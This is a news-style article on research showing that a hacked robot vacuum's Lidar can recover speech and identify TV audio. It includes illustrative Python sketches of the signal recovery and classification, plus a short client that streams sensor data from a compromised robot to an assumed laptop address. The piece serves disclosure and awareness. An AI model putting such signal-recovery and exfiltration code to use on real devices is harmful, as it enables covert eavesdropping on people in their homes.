Could your robot vacuum be listening to you?

A team of researchers has shown that popular robotic household vacuum cleaners can be tampered with remotely and made to act as microphones.

The researchers tested the laser-based navigation system of a popular robotic vacuum cleaner and, by applying various signal-processing techniques, were able to recover speech in the room and identify the sound of a TV playing in the same room at the time.

The research shows that any device using Lidar (Light Detection and Ranging) technology can be manipulated to collect sound, even though it has no microphone. The work, a collaboration between Assistant Professor Jun Han at the National University of Singapore and Nirupam Roy, Assistant Professor in the Department of Computer Science at the University of Maryland, was presented at the Association for Computing Machinery's Conference on Embedded Networked Sensor Systems (SenSys 2020) on 18 November 2020.

Commenting on the research, Nirupam Roy said: "We bring these devices into our homes and do not think twice about it. However, we have shown that even though these devices do not have microphones, we can repurpose the systems they use for navigation to spy on conversations and potentially reveal private information."

Lidar navigation systems in home vacuum robots emit a laser beam around a room and sense its reflection as it bounces off nearby objects. The robots use the reflected signals to map the room and avoid collisions as they move through the house.
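To make that navigation step concrete, here is a minimal Python sketch, with made-up function names and parameters, of how a single sweep of angle-and-distance Lidar readings can be turned into 2D points and a coarse occupancy map. It illustrates the general idea only, not code from any vacuum's firmware.

```python
# Illustrative sketch (not a robot's firmware): turn one Lidar sweep of
# (angle, distance) readings into 2D points and mark them on a coarse
# occupancy grid, the basic idea behind mapping and collision avoidance.
import math

def scan_to_points(scan, robot_x=0.0, robot_y=0.0):
    """scan: list of (angle_radians, distance_metres) pairs from one sweep."""
    return [(robot_x + d * math.cos(a), robot_y + d * math.sin(a)) for a, d in scan]

def mark_occupancy(points, cell_size=0.1):
    """Map each reflection point to a grid cell; occupied cells outline walls and obstacles."""
    return {(int(x // cell_size), int(y // cell_size)) for x, y in points}

if __name__ == "__main__":
    fake_scan = [(math.radians(a), 2.0) for a in range(0, 360, 10)]  # a 2 m circular "room"
    cells = mark_occupancy(scan_to_points(fake_scan))
    print(f"{len(cells)} occupied cells detected")
```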

Security researchers have reported that the maps created by robot vacuums, which are often stored in the cloud, pose potential privacy risks: they could give attackers access to information of interest, such as the size of the home, which hints at income level and other lifestyle details. Roy and his team wondered whether the Lidar in these robots could also pose a security risk by acting as an audio recorder in a user's home or business.

Sound waves cause objects to vibrate, and these vibrations produce small fluctuations in the light bouncing off them. Laser microphones, used in espionage since the 1940s, convert these variations back into sound. However, laser microphones rely on a targeted laser beam reflecting off very smooth surfaces, such as glass windows.

A Lidar-equipped vacuum cleaner, on the other hand, scans the environment with its laser and senses the light scattered back by objects that are irregular in shape and density. The scattered signal received by the vacuum's sensor carries only a fraction of the information needed to recover sound waves. The researchers were unsure whether the Lidar system of a robotic vacuum cleaner could be manipulated to function as a microphone, and whether its signal could be interpreted and converted into meaningful audio.
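As a rough illustration of that recovery problem, here is a sketch under assumptions rather than the authors' pipeline: the stream of reflected-intensity samples can be treated as a very low-rate audio signal, the slow drift removed, and the remainder normalised and written out as a WAV file. The sampling rate, smoothing window, and function names below are invented for the example.

```python
# Illustrative sketch of the core idea described above (not the authors' code):
# treat fluctuations in reflected laser intensity as an audio signal, strip the
# slow-varying component, and save the result as a WAV file.
import wave
import numpy as np

def intensity_to_audio(intensity, window=50):
    """intensity: 1-D array of reflected-intensity samples taken at a fixed rate."""
    x = np.asarray(intensity, dtype=np.float64)
    baseline = np.convolve(x, np.ones(window) / window, mode="same")  # slow drift
    audio = x - baseline                                              # keep the vibration part
    audio /= (np.max(np.abs(audio)) or 1.0)                           # normalise to [-1, 1]
    return audio

def save_wav(audio, path, sample_rate=2000):
    """Write the normalised signal as 16-bit mono PCM."""
    pcm = (audio * 32767).astype(np.int16)
    with wave.open(path, "wb") as f:
        f.setnchannels(1)
        f.setsampwidth(2)
        f.setframerate(sample_rate)
        f.writeframes(pcm.tobytes())
```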

First, the researchers hacked a robot vacuum to show that they could control the position of the laser beam and send the sensor data to their laptops over Wi-Fi without interfering with the device's navigation.
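A hypothetical sketch of that exfiltration step is shown below; the host, port, packet format, and sensor interface are all assumptions, since the modified firmware is not described here. It shows a small client on a compromised robot forwarding raw Lidar readings to a laptop over Wi-Fi.

```python
# Hypothetical sketch of the data-forwarding step: a small client running on
# an already compromised robot that streams raw sensor readings to a laptop
# over Wi-Fi. Host, port, and packet format are assumptions for illustration.
import json
import socket
import time

LAPTOP_HOST = "192.168.1.50"   # assumed address of the listening laptop
LAPTOP_PORT = 9999             # assumed TCP port

def stream_readings(read_sensor, interval_s=0.01):
    """read_sensor: callable returning one Lidar reading as a dict."""
    with socket.create_connection((LAPTOP_HOST, LAPTOP_PORT)) as sock:
        while True:
            packet = json.dumps(read_sensor()).encode() + b"\n"
            sock.sendall(packet)
            time.sleep(interval_s)

# usage (with a dummy sensor): stream_readings(lambda: {"angle": 0.0, "intensity": 123})
```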

They then experimented with two sound sources. One was a human voice played through computer speakers; the other was audio from a variety of TV shows played through a television. Roy and his colleagues captured the laser signal detected by the vacuum's navigation system as it bounced off objects placed near the sound sources. The objects included a trash can, a cardboard box, a takeout container and a polypropylene bag, items typically found on an ordinary floor.

The researchers passed the captured signals through AI algorithms trained either to match human voices or to identify musical sequences from television shows. Their system, which they call LidarPhone, identified and matched the spoken sounds with 90% accuracy. It also identified TV shows from one minute of recording with better than 90% accuracy.
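For a sense of what that matching step involves, here is a minimal, hypothetical Python sketch using off-the-shelf tools (numpy and scikit-learn): each recovered clip is reduced to a simple spectral feature vector and a standard classifier is trained to label it. It illustrates the general approach, not the actual LidarPhone models or their reported accuracy.

```python
# Minimal, hypothetical sketch of the classification step: turn each recovered
# clip into a spectral feature vector and train an off-the-shelf classifier to
# label it (e.g. which spoken word, or which TV show it came from).
import numpy as np
from sklearn.svm import SVC

def spectral_features(clip, n_bands=32):
    """Average the magnitude spectrum of a 1-D audio clip into n_bands bins."""
    spectrum = np.abs(np.fft.rfft(clip))
    bands = np.array_split(spectrum, n_bands)
    return np.array([b.mean() for b in bands])

def train_classifier(clips, labels):
    """clips: list of 1-D numpy arrays; labels: matching class names."""
    X = np.vstack([spectral_features(c) for c in clips])
    return SVC(kernel="rbf").fit(X, labels)

# usage: clf = train_classifier(train_clips, train_labels)
#        clf.predict([spectral_features(test_clip)])
```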

The researchers point out that robotic vacuum cleaners are just one example of a potential vulnerability to Lidar-based spying. Many other devices could be open to similar attacks, such as smartphone infrared sensors used for face recognition, or passive infrared sensors used for motion detection.

"I believe this is important research that will make manufacturers aware of these features and push the security and privacy community to find solutions to prevent such attacks," Roy said.
